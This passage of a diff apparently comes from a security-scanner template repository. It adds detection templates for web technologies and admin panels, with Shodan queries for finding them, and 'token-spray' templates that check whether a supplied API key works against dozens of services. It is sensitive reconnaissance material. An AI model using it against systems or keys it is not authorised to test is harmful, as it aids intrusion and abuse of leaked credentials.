--- a/technologies/sap/sap-netweaver-detect.yaml
+++ b/technologies/sap/sap-netweaver-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: randomstr1ng
   severity: info
   description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF)
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
   tags: sap,webserver
 
 requests:
diff --git a/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/technologies/sap/sap-web-dispatcher-admin-portal.yaml
index c2499e7ac3..cb9098ad29 100644
--- a/technologies/sap/sap-web-dispatcher-admin-portal.yaml
+++ b/technologies/sap/sap-web-dispatcher-admin-portal.yaml
@@ -5,6 +5,8 @@ info:
   author: randomstr1ng
   severity: info
   description: Detection of SAP Web Dispatcher Admin Portal
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
   tags: sap,webserver,proxy
 
 requests:
diff --git a/technologies/shopware-detect.yaml b/technologies/shopware-detect.yaml
index d62698b57e..6ff87dbc09 100644
--- a/technologies/shopware-detect.yaml
+++ b/technologies/shopware-detect.yaml
@@ -8,6 +8,9 @@ info:
   reference:
     - https://github.com/shopware/shopware
     - https://github.com/shopware/platform
+  metadata:
+    verified: true
+    shodan-query: title:"shopware AG"
   tags: tech,shopware,cms
 
 requests:
@@ -16,6 +19,7 @@ requests:
       - "{{BaseURL}}/admin"
       - "{{BaseURL}}/backend"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -29,4 +33,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml
index 005aad947e..dc4c4e567b 100644
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@@ -2,8 +2,10 @@ id: springboot-actuator
 
 info:
   name: Detect Springboot Actuators
-  author: that_juan_,dwisiswant0,wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb,dr0pd34d
   severity: info
+  metadata:
+    shodan-query: http.favicon.hash:116323821
   tags: tech,springboot,actuator
 
 requests:
@@ -29,3 +31,9 @@ requests:
         name: "favicon"
         dsl:
           - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))"
+
+    extractors:
+      - type: json
+        name: available-endpoints
+        json:
+          - .[] | to_entries | .[].key
diff --git a/technologies/sucuri-firewall.yaml b/technologies/sucuri-firewall.yaml
index 2e980f7dc4..5dffe6b8ac 100644
--- a/technologies/sucuri-firewall.yaml
+++ b/technologies/sucuri-firewall.yaml
@@ -1,25 +1,25 @@
-id: sucuri-firewall
-
-info:
-  name: Sucuri Website Firewall - Not Configured
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: "sucuri firewall"
-    shodan-query: http.html:"sucuri firewall"
-  tags: tech,sucuri,firewall
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Sucuri WebSite Firewall - Not Configured</title>'
-
-      - type: status
-        status:
-          - 404
+id: sucuri-firewall
+
+info:
+  name: Sucuri Website Firewall - Not Configured
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: "sucuri firewall"
+    shodan-query: http.html:"sucuri firewall"
+  tags: tech,sucuri,firewall
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Sucuri WebSite Firewall - Not Configured</title>'
+
+      - type: status
+        status:
+          - 404
diff --git a/technologies/swag-instance-default-page.yaml b/technologies/swag-instance-default-page.yaml
new file mode 100644
index 0000000000..edc59464ab
--- /dev/null
+++ b/technologies/swag-instance-default-page.yaml
@@ -0,0 +1,31 @@
+id: swag-instance-default-page
+
+info:
+  name: Swag Instance Default Page
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Welcome to your SWAG instance"
+  tags: panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>Welcome to your SWAG instance</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml
index ec14264ba5..b8e15e430c 100644
--- a/technologies/synology-web-station.yaml
+++ b/technologies/synology-web-station.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7125
-  tags: tech,synology
+  tags: tech,synology,edb
 
 requests:
   - method: GET
diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml
index eb77c21721..19307b4486 100644
--- a/technologies/tileserver-gl.yaml
+++ b/technologies/tileserver-gl.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7296
   metadata:
     shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles"
-    google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles"
-  tags: tech,tileserver
+    google-query: intitle:"TileServer GL - Server for vector and raster maps with GL styles"
+  tags: tech,tileserver,edb
 
 requests:
   - method: GET
diff --git a/technologies/web-ftp-detect.yaml b/technologies/web-ftp-detect.yaml
index 571cd16c99..7520867056 100644
--- a/technologies/web-ftp-detect.yaml
+++ b/technologies/web-ftp-detect.yaml
@@ -1,23 +1,23 @@
-id: web-ftp-detect
+id: web-ftp-detect
 
-info:
-  name: Web FTP Detection
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7013
-  tags: webftp,tech,ftp
+info:
+  name: Web FTP Detection
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7013
+  tags: webftp,tech,ftp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Web-FTP"
-          - "square login"
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Web-FTP"
+          - "square login"
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml
index 46ea04ff2b..da06c7d247 100644
--- a/technologies/wordpress-detect.yaml
+++ b/technologies/wordpress-detect.yaml
@@ -27,6 +27,7 @@ requests:
 
       - type: word
         words:
+          - 'wp-login.php'
           - '/wp-content/themes/'
           - '/wp-includes/'
           - 'name="generator" content="wordpress'
diff --git a/technologies/yeswiki-detect.yaml b/technologies/yeswiki-detect.yaml
new file mode 100644
index 0000000000..83e0f79dba
--- /dev/null
+++ b/technologies/yeswiki-detect.yaml
@@ -0,0 +1,30 @@
+id: yeswiki-detect
+
+info:
+  name: YesWiki Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'yeswiki-search'
+          - 'yeswiki-base'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/zap-api-detect.yaml b/technologies/zap-api-detect.yaml
new file mode 100644
index 0000000000..e8fd38f23a
--- /dev/null
+++ b/technologies/zap-api-detect.yaml
@@ -0,0 +1,23 @@
+id: zap-rest-api-detect
+
+info:
+  name: ZAP Rest API Server Running
+  author: hahwul
+  severity: info
+  reference:
+    - https://www.zaproxy.org/docs/api/
+  tags: zap,tech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: response
+        words:
+          - '<title>ZAP API UI</title>'
+          - 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
+          - 'Access-Control-Allow-Headers: ZAP-Header'
+        condition: or
\ No newline at end of file
diff --git a/token-spray/api-1forge.yaml b/token-spray/api-1forge.yaml
new file mode 100644
index 0000000000..0236e449c6
--- /dev/null
+++ b/token-spray/api-1forge.yaml
@@ -0,0 +1,26 @@
+id: api-1forge
+
+info:
+  name: 1Forge API Test
+  author: daffainfo
+  severity: info
+  description: Forex currency market data
+  reference:
+    - https://1forge.com/api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/1forge
+  tags: token-spray,1forge
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.1forge.com/quota?api_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"quota_used":'
+          - '"quota_limit":'
+          - '"quota_remaining":'
+        condition: and
diff --git a/token-spray/api-abstract-company-enrichment.yaml b/token-spray/api-abstract-company-enrichment.yaml
new file mode 100644
index 0000000000..4b84a4367e
--- /dev/null
+++ b/token-spray/api-abstract-company-enrichment.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-company-enrichment
+
+info:
+  name: Abstract Api Company Enrichment Test
+  author: daffainfo
+  severity: info
+  description: Enrich any domain or email with accurate company data, including headcount, location and industry.
+  reference:
+    - https://www.abstractapi.com/api/company-enrichment
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-company-enrichment
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://companyenrichment.abstractapi.com/v1/?api_key={{token}}&domain=airbnb.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"name":'
+          - '"domain":'
+          - '"year_founded":'
+        condition: and
diff --git a/token-spray/api-abstract-email-validation.yaml b/token-spray/api-abstract-email-validation.yaml
new file mode 100644
index 0000000000..145e4a97de
--- /dev/null
+++ b/token-spray/api-abstract-email-validation.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-email-validation
+
+info:
+  name: Abstract Api Email Validation Test
+  author: daffainfo
+  severity: info
+  description: Improve your delivery rate and clean your email lists with Abstract's industry-leading email verification API
+  reference:
+    - https://www.abstractapi.com/api/email-verification-validation-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-email-validation
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://emailvalidation.abstractapi.com/v1/?api_key={{token}}&email=johnsmith@gmail.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"email":'
+          - '"autocorrect":'
+          - '"is_valid_format":'
+        condition: and
diff --git a/token-spray/api-abstract-exchange-rates.yaml b/token-spray/api-abstract-exchange-rates.yaml
new file mode 100644
index 0000000000..4a0f81a277
--- /dev/null
+++ b/token-spray/api-abstract-exchange-rates.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-exchange-rates
+
+info:
+  name: Abstract Api Exchange Rates Test
+  author: daffainfo
+  severity: info
+  description: Get live and historical data from 60+ fiat and crypto currencies via a modern REST API
+  reference:
+    - https://www.abstractapi.com/api/exchange-rate-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-exchange-rates
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://exchange-rates.abstractapi.com/v1/live/?api_key={{token}}&base=USD"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"base":'
+          - '"last_updated":'
+          - '"exchange_rate":'
+        condition: and
diff --git a/token-spray/api-abstract-iban-validation.yaml b/token-spray/api-abstract-iban-validation.yaml
new file mode 100644
index 0000000000..b605fcc7d4
--- /dev/null
+++ b/token-spray/api-abstract-iban-validation.yaml
@@ -0,0 +1,25 @@
+id: api-abstract-iban-validation
+
+info:
+  name: Abstract Api IBAN Validation Test
+  author: daffainfo
+  severity: info
+  description: A powerful REST API to validate IBAN quickly and securely
+  reference:
+    - https://www.abstractapi.com/api/iban-validation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-iban-validation
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://ibanvalidation.abstractapi.com/v1/?api_key={{token}}&iban=BE71096123456769"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"iban":'
+          - '"is_valid":'
+        condition: and
diff --git a/token-spray/api-abstract-image-processing.yaml b/token-spray/api-abstract-image-processing.yaml
new file mode 100644
index 0000000000..ee0815c59a
--- /dev/null
+++ b/token-spray/api-abstract-image-processing.yaml
@@ -0,0 +1,31 @@
+id: api-abstract-image-processing
+
+info:
+  name: Abstract Api Image Processing Test
+  author: daffainfo
+  severity: info
+  description: Manage your images programmatically with this powerful API compress, convert, crop, resize, and more.
+  reference:
+    - https://www.abstractapi.com/api/image-processing-optimization-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-image-processing
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://images.abstractapi.com/v1/url/ HTTP/1.1
+        Host: images.abstractapi.com
+        Content-Type: application/json
+        Accept: application/json
+
+        {"api_key": "{{token}}", "lossy": true, "url": "https://s3.amazonaws.com/static.abstractapi.com/test-images/dog.jpg"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"original_size":'
+          - '"original_height":'
+          - '"original_width":'
+        condition: and
diff --git a/token-spray/api-abstract-ip-geolocation.yaml b/token-spray/api-abstract-ip-geolocation.yaml
new file mode 100644
index 0000000000..63227eb94e
--- /dev/null
+++ b/token-spray/api-abstract-ip-geolocation.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-ip-geolocation
+
+info:
+  name: Abstract Api IP Geolocation Test
+  author: daffainfo
+  severity: info
+  description: Get the location of any IP with a world-class APIserving city, region, country and lat/long data.
+  reference:
+    - https://www.abstractapi.com/api/ip-geolocation-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-ip-geolocation
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://ipgeolocation.abstractapi.com/v1/?api_key={{token}}&ip_address=92.184.105.98"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"ip":'
+          - '"city":'
+          - '"city_geoname_id":'
+        condition: and
diff --git a/token-spray/api-abstract-phone-validation.yaml b/token-spray/api-abstract-phone-validation.yaml
new file mode 100644
index 0000000000..25f3807509
--- /dev/null
+++ b/token-spray/api-abstract-phone-validation.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-phone-validation
+
+info:
+  name: Abstract Api Phone Validation Test
+  author: daffainfo
+  severity: info
+  description: Improve your contact rate and clean your lists with Abstract's industry-leading phone number validation API
+  reference:
+    - https://www.abstractapi.com/api/phone-validation-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-phone-validation
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://phonevalidation.abstractapi.com/v1/?api_key={{token}}&number=14154582468"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"number":'
+          - '"is_valid_number":'
+          - '"local_format":'
+        condition: and
diff --git a/token-spray/api-abstractapi.yaml b/token-spray/api-abstract-public-holidays.yaml
similarity index 65%
rename from token-spray/api-abstractapi.yaml
rename to token-spray/api-abstract-public-holidays.yaml
index d817d4faeb..52102f98ea 100644
--- a/token-spray/api-abstractapi.yaml
+++ b/token-spray/api-abstract-public-holidays.yaml
@@ -1,12 +1,13 @@
-id: api-abstractapi
+id: api-abstract-public-holidays
 
 info:
   name: Abstract Api Public Holidays Test
   author: daffainfo
   severity: info
+  description: Data on national, regional, and religious holidays via API
   reference:
-    - https://www.abstractapi.com/holidays-api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md
+    - https://www.abstractapi.com/api/holidays-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-public-holidays
   tags: token-spray,abstractapi
 
 self-contained: true
diff --git a/token-spray/api-abstract-timezone.yaml b/token-spray/api-abstract-timezone.yaml
new file mode 100644
index 0000000000..e3baf9d1f1
--- /dev/null
+++ b/token-spray/api-abstract-timezone.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-timezone
+
+info:
+  name: Abstract Api Timezone Test
+  author: daffainfo
+  severity: info
+  description: Quickly and easily get the time and date of a location or IP address, or convert the time and date of one timezone into another
+  reference:
+    - https://www.abstractapi.com/api/time-date-timezone-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-timezone
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://timezone.abstractapi.com/v1/current_time/?api_key={{token}}&location=Oxford,%20United%20Kingdom"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"requested_location":'
+          - '"longitude":'
+          - '"latitude":'
+        condition: and
diff --git a/token-spray/api-abstract-user-avatars.yaml b/token-spray/api-abstract-user-avatars.yaml
new file mode 100644
index 0000000000..55c54f4042
--- /dev/null
+++ b/token-spray/api-abstract-user-avatars.yaml
@@ -0,0 +1,23 @@
+id: api-abstract-user-avatars
+
+info:
+  name: Abstract Api User Avatars Test
+  author: daffainfo
+  severity: info
+  description: Create highly customizable avatar images with a person's name or initials to improve your user experience.
+  reference:
+    - https://www.abstractapi.com/api/user-avatar-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-user-avatars
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://avatars.abstractapi.com/v1/?api_key={{token}}&name=example"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'image/png'
diff --git a/token-spray/api-abstract-vat-validation-rates.yaml b/token-spray/api-abstract-vat-validation-rates.yaml
new file mode 100644
index 0000000000..7f14dbe89d
--- /dev/null
+++ b/token-spray/api-abstract-vat-validation-rates.yaml
@@ -0,0 +1,26 @@
+id: api-abstract-vat-validation-rates
+
+info:
+  name: Abstract Api VAT Validation Rates Test
+  author: daffainfo
+  severity: info
+  description: Stay compliant with our simple, reliable, and powerful API for all your domestic and cross-border sales.
+  reference:
+    - https://www.abstractapi.com/api/vat-validation-rates-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-vat-validation-rates
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://vat.abstractapi.com/v1/?api_key={{token}}&vat_number=SE556656688001"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"vat_number":'
+          - '"is_vat_valid":'
+          - '"company_name":'
+        condition: and
diff --git a/token-spray/api-abstract-website-scraping.yaml b/token-spray/api-abstract-website-scraping.yaml
new file mode 100644
index 0000000000..b0531d28a3
--- /dev/null
+++ b/token-spray/api-abstract-website-scraping.yaml
@@ -0,0 +1,25 @@
+id: api-abstract-website-scraping
+
+info:
+  name: Abstract Api Web Scraping Test
+  author: daffainfo
+  severity: info
+  description: Scrape and extract data from any website, with powerful options like proxy / browser customization, CAPTCHA handling, ad blocking, and more.
+  reference:
+    - https://www.abstractapi.com/api/web-scraping-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-scraping
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://scrape.abstractapi.com/v1/?api_key={{token}}&url=https://test.test"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"code":"validation_error"'
+          - 'Reached error page'
+        condition: and
diff --git a/token-spray/api-abstract-website-screenshot.yaml b/token-spray/api-abstract-website-screenshot.yaml
new file mode 100644
index 0000000000..8c44c52c6f
--- /dev/null
+++ b/token-spray/api-abstract-website-screenshot.yaml
@@ -0,0 +1,25 @@
+id: api-abstract-website-screenshot
+
+info:
+  name: Abstract Api Website Screenshot Test
+  author: daffainfo
+  severity: info
+  description: Transform any URL into an image with Abstract's Website Screenshot API
+  reference:
+    - https://www.abstractapi.com/api/website-screenshot-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-screenshot
+  tags: token-spray,abstractapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://screenshot.abstractapi.com/v1/?api_key={{token}}&url=https://test.test"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"code":"validation_error"'
+          - 'Reached error page'
+        condition: and
\ No newline at end of file
diff --git a/token-spray/api-abuseipdb.yaml b/token-spray/api-abuseipdb.yaml
index ca83d86700..ac31e6504f 100644
--- a/token-spray/api-abuseipdb.yaml
+++ b/token-spray/api-abuseipdb.yaml
@@ -4,9 +4,10 @@ info:
   name: AbuseIPDB API Test
   author: daffainfo
   severity: info
+  description: IP/domain/URL reputation
   reference:
     - https://docs.abuseipdb.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/abuseipdb
   tags: token-spray,abuseipdb
 
 self-contained: true
diff --git a/token-spray/api-adoptapet.yaml b/token-spray/api-adoptapet.yaml
index 485b64da0a..09d1d4f199 100644
--- a/token-spray/api-adoptapet.yaml
+++ b/token-spray/api-adoptapet.yaml
@@ -4,9 +4,10 @@ info:
   name: AdoptAPet API Test
   author: daffainfo
   severity: info
+  description: Resource to help get pets adopted
   reference:
     - https://www.adoptapet.com/public/apis/pet_list.html
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/AdoptAPet.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/adoptapet
   tags: token-spray,adoptapet
 
 self-contained: true
diff --git a/token-spray/api-airtable.yaml b/token-spray/api-airtable.yaml
new file mode 100644
index 0000000000..d076f34909
--- /dev/null
+++ b/token-spray/api-airtable.yaml
@@ -0,0 +1,28 @@
+id: api-airtable
+
+info:
+  name: Airtable API Test
+  author: daffainfo
+  severity: info
+  description: Integrate with Airtable
+  reference:
+    - https://airtable.com/api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/airtable
+  tags: token-spray,airtable
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.airtable.com/v0/meta/bases HTTP/1.1
+        Host: api.airtable.com
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"bases"'
+          - '"id"'
+          - '"name"'
+        condition: and
diff --git a/token-spray/api-alchemy.yaml b/token-spray/api-alchemy.yaml
index d270a2127f..88cccae875 100644
--- a/token-spray/api-alchemy.yaml
+++ b/token-spray/api-alchemy.yaml
@@ -4,9 +4,10 @@ info:
   name: Alchemy API Test
   author: daffainfo
   severity: info
+  description: Ethereum Node-as-a-Service Provider
   reference:
     - https://docs.alchemy.com/alchemy/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Alchemy.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/alchemy
   tags: token-spray,alchemy
 
 self-contained: true
diff --git a/token-spray/api-alienvault.yaml b/token-spray/api-alienvault.yaml
index d0e5ba33ae..54d75e6259 100644
--- a/token-spray/api-alienvault.yaml
+++ b/token-spray/api-alienvault.yaml
@@ -4,9 +4,10 @@ info:
   name: AlienVault Open Threat Exchange (OTX) API Test
   author: daffainfo
   severity: info
+  description: IP/domain/URL reputation
   reference:
     - https://otx.alienvault.com/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange
   tags: token-spray,alienvault,exchange
 
 self-contained: true
diff --git a/token-spray/api-amdoren.yaml b/token-spray/api-amdoren.yaml
new file mode 100644
index 0000000000..f785b8eb6d
--- /dev/null
+++ b/token-spray/api-amdoren.yaml
@@ -0,0 +1,25 @@
+id: api-amdoren
+
+info:
+  name: Amdoren API Test
+  author: daffainfo
+  severity: info
+  description: Free currency API with over 150 currencies
+  reference:
+    - https://www.amdoren.com/currency-api/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/amdoren
+  tags: token-spray,amdoren
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://www.amdoren.com/api/currency.php?api_key={{token}}&from=USD&to=EUR"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"error" : 0'
+          - '"error_message" : "-"'
+        condition: and
diff --git a/token-spray/api-aniapi.yaml b/token-spray/api-aniapi.yaml
index ab84bcd31f..233ab76dc8 100644
--- a/token-spray/api-aniapi.yaml
+++ b/token-spray/api-aniapi.yaml
@@ -4,9 +4,10 @@ info:
   name: AniAPI API Test
   author: daffainfo
   severity: info
+  description: Anime discovery, streaming & syncing with trackers
   reference:
     - https://aniapi.com/docs/authentication
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/aniapi
   tags: token-spray,aniapi
 
 self-contained: true
diff --git a/token-spray/api-api2convert.yaml b/token-spray/api-api2convert.yaml
new file mode 100644
index 0000000000..64abcff5c5
--- /dev/null
+++ b/token-spray/api-api2convert.yaml
@@ -0,0 +1,39 @@
+id: api-api2convert
+
+info:
+  name: Api2Convert API Test
+  author: daffainfo
+  severity: info
+  description: Online File Conversion API
+  reference:
+    - https://www.api2convert.com/docs/index.html
+    - https://github.com/daffainfo/all-about-apikey/tree/main/api2convert
+  tags: token-spray,api2convert
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://api.api2convert.com/v2/jobs HTTP/1.1
+        Host: api.api2convert.com
+        X-Oc-Api-Key: {{token}}
+        Content-Type: application/json
+
+        {
+            "input": [{
+                "type": "remote",
+                "source": "https://example-files.online-convert.com/raster%20image/jpg/example_small.jpg"
+            }],
+            "conversion": [{
+                "target": "png"
+            }]
+        }
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id"'
+          - '"token"'
+          - '"type"'
+        condition: and
diff --git a/token-spray/api-apiflash.yaml b/token-spray/api-apiflash.yaml
new file mode 100644
index 0000000000..60df0ee264
--- /dev/null
+++ b/token-spray/api-apiflash.yaml
@@ -0,0 +1,23 @@
+id: api-apiflash
+
+info:
+  name: ApiFlash API Test
+  author: daffainfo
+  severity: info
+  description: Chrome based screenshot API for developers
+  reference:
+    - https://apiflash.com/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/apiflash
+  tags: token-spray,apiflash
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.apiflash.com/v1/urltoimage?access_key={{token}}&url=https://selfcontained.test"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'net::ERR_NAME_NOT_RESOLVED at https://selfcontained.test'
diff --git a/token-spray/api-asana.yaml b/token-spray/api-asana.yaml
index 7dd56ecc60..297b994989 100644
--- a/token-spray/api-asana.yaml
+++ b/token-spray/api-asana.yaml
@@ -4,8 +4,10 @@ info:
   name: Asana API Test
   author: zzeitlin
   severity: info
+  description: Programmatic access to all data in your asana system
   reference:
     - https://developers.asana.com/docs/using-terminal
+    - https://github.com/daffainfo/all-about-apikey/tree/main/asana
   tags: token-spray,asana
 
 self-contained: true
diff --git a/token-spray/api-bhagavadgita.yaml b/token-spray/api-bhagavadgita.yaml
index adf13a2eaf..1322990f34 100644
--- a/token-spray/api-bhagavadgita.yaml
+++ b/token-spray/api-bhagavadgita.yaml
@@ -4,9 +4,10 @@ info:
   name: Bhagavad Gita API Test
   author: daffainfo
   severity: info
+  description: Open Source Shrimad Bhagavad Gita API including 21+ authors translation in Sanskrit/English/Hindi
   reference:
     - https://docs.bhagavadgitaapi.in/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Bhagavad%20Gita.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/bhagavad-gita
   tags: token-spray,bhagavadgita
 
 self-contained: true
diff --git a/token-spray/api-bible.yaml b/token-spray/api-bible.yaml
index 313d9d6612..9e47277d90 100644
--- a/token-spray/api-bible.yaml
+++ b/token-spray/api-bible.yaml
@@ -4,9 +4,10 @@ info:
   name: API.Bible API Test
   author: daffainfo
   severity: info
+  description: Everything you need from the Bible in one discoverable place
   reference:
     - https://docs.api.bible
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible
   tags: token-spray,bible
 
 self-contained: true
diff --git a/token-spray/api-binance.yaml b/token-spray/api-binance.yaml
index 2a4707d57d..cc65fe9d3e 100644
--- a/token-spray/api-binance.yaml
+++ b/token-spray/api-binance.yaml
@@ -4,9 +4,10 @@ info:
   name: Binance REST API
   author: geeknik
   severity: info
+  description: Exchange for Trading Cryptocurrencies based in China
   reference:
     - https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Binance.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/binance
   tags: token-spray,binance
 
 self-contained: true
diff --git a/token-spray/api-binaryedge.yaml b/token-spray/api-binaryedge.yaml
new file mode 100644
index 0000000000..43b39ba396
--- /dev/null
+++ b/token-spray/api-binaryedge.yaml
@@ -0,0 +1,28 @@
+id: api-binaryedge
+
+info:
+  name: BinaryEdge API Test
+  author: 0ri2N
+  severity: info
+  description: |
+    BinaryEdge combines Machine Learning and Cybersecurity techniques in a custom built platform to scan, acquire and classify public Internet data. This platform scans the entire public Internet space and creates real-time threat intelligence streams and reports about your company.
+  reference:
+    - https://binaryedge.io
+    - https://docs.binaryedge.io
+  tags: dns,scan,recon,binaryedge,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.binaryedge.io/v2/user/subscription
+    headers:
+      X-Key: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"subscription"'
+          - '"requests_left"'
+        condition: and
diff --git a/token-spray/api-bitcoinaverage.yaml b/token-spray/api-bitcoinaverage.yaml
index 4178562863..2cafe7979a 100644
--- a/token-spray/api-bitcoinaverage.yaml
